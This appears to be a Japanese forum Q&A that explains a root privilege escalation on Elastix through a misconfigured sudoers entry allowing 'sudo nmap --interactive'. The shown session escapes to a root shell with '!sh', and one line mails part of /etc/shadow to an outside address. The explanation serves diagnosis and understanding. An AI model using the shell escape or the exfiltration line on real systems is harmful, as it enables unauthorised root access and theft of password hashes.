Elastixに権限昇格の脆弱性があります。
# id
# uid=100(name) gid=101(name)
# Sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
通常のユーザーはどのようにしてSudo特権でnmapを開始できますか?ここで正しく構成されていないものは何ですか?
構成の誤りは、グループ、またはsudoers.conf
のユーザーエントリのいずれかから発生します。これは、(Sudoに関して)誰が何をできるかを制御するファイルです。この例では、コマンドで判断します(編集されていない場合)。sudoers
ファイルには、パスワードを入力せずにSudoコマンドを実行するためのユーザーアスタリスクのエントリが含まれています。
nmap --interactive
の場合-これは少し前に削除されました。システムを悪用するためにnmap
にいる間に誰かが使用できる回避策がありました。例えば。:
nmap> !head -n1 /etc/shadow | mail -s shadow [email protected]